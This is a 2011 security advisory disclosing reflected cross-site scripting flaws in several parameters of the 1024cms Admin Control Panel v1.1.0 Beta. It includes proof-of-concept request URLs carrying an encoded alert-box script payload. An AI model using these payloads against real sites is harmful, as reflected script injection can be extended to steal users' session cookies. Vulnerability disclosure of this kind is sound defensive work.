Skip to Content

XSS Vulnerability in 1024cms Admin Control Panel v1.1.0 Beta (Complete-Modules Package)


Posted by Michalis Nicolaou


           

XSS Vulnerability in 1024cms Admin Control Panel v1.1.0 Beta (Complete-Modules Package)


Software:    1024cms Admin Control Panel v1.1.0 Beta (complete-modules package)

Vendor:    http://1024cms.org/

Vulnerability Type:    Cross-Site Scripting (non-persistent)

Remote:    Yes

Local:    No

Discovered:    15 March 2011

Reported:    29 March 2011

Disclosed:    04 April 2011

VULNERABILITY DESCRIPTION:

The script ''/index.php'' is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input in the ''msg'' parameter.

The script ''/dashboard.php'' is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input in the ''msg_error'', ''msg_okay'', ''msg_info'', ''msg_attention'' parameters.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

PoC Exploit:

/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b

/dashboard.php?msg_error=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b

/dashboard.php?msg_okay=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b

/dashboard.php?msg_info=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b

/dashboard.php?msg_attention=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b

Note:

PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b = URL_Encoded(Base64_Encoded(XSS string))


Recommended Post